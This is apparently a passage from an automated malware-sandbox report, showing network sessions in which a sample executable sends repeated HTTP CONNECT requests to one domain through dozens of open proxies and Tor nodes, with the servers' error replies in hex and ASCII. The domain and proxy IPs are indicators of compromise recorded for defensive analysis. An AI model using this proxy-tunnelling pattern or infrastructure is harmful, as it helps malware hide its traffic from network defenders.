                                                                                                      Data Ascii: e[GRpJjQ-*,+0/$#('=<5/n-+(heygirlisheeverythingyouwantedinaman.com#


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      144192.168.2.44979872.195.114.16941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.304627895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.349904060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      145192.168.2.450331211.222.252.187806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.322741985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      146192.168.2.450440157.185.161.100265896812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.340415001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      147192.168.2.450449104.19.85.214806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.342904091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.430437088 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      148192.168.2.45043020.111.54.1681236812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.343105078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.503427982 CET319INHTTP/1.1 403 Forbidden
                                                                                                      Server: squid
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 17
                                                                                                      X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                      X-Cache: MISS from cdn-fintech.info
                                                                                                      X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                      Connection: keep-alive
                                                                                                      Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                      Data Ascii: ERR_ACCESS_DENIED


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      149192.168.2.450464172.67.200.220806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.358428955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.446367979 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      150192.168.2.450465185.162.229.70806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.358818054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.446465015 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      151192.168.2.45050143.153.64.664436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.367453098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      152192.168.2.45050243.153.64.664436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.369812965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      153192.168.2.45050343.153.64.664436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.371423006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      154192.168.2.45050443.153.64.664436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.372992039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      155192.168.2.450436208.87.131.151269396812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.375382900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      156192.168.2.450358203.222.24.36806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.401190042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.733129025 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      157192.168.2.45035513.229.47.109806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.421205044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.763205051 CET223INHTTP/1.1 400 Bad Request
                                                                                                      Date: Fri, 23 Feb 2024 08:43:04 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Content-Length: 12
                                                                                                      X-Kong-Response-Latency: -8.392333984375e-05
                                                                                                      Server: kong/2.8.1
                                                                                                      Data Raw: 42 61 64 20 72 65 71 75 65 73 74 0a
                                                                                                      Data Ascii: Bad request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      158192.168.2.450455184.181.217.20141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.423247099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      159192.168.2.449819167.86.69.142468596812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.443068027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.490957975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.612484932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.716526031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.834578037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:52.834280014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:04.834522009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      160192.168.2.450396106.14.255.124806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.454449892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.796132088 CET309INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.20.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      161192.168.2.44984489.161.90.20356786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.470397949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      162192.168.2.44985124.249.199.441456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.477750063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      163192.168.2.450471185.49.31.20780816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.477813959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      164192.168.2.449862167.86.102.169373796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.498887062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.646845102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      165192.168.2.45049764.227.106.157806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.514652967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.668529987 CET327INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      166192.168.2.45051223.95.216.90156736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.516777992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      167192.168.2.44987594.131.107.4510806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.516815901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.646750927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      168192.168.2.45042461.7.183.15241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.518071890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      169192.168.2.44986051.83.190.248190506812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.522881031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:17.527632952 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                      Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      170192.168.2.450446122.116.150.290006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.529165983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      171192.168.2.450077120.234.203.17190026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.530694008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.378470898 CET311INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:45:17 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      172192.168.2.449892160.153.245.18757846812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.537065983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
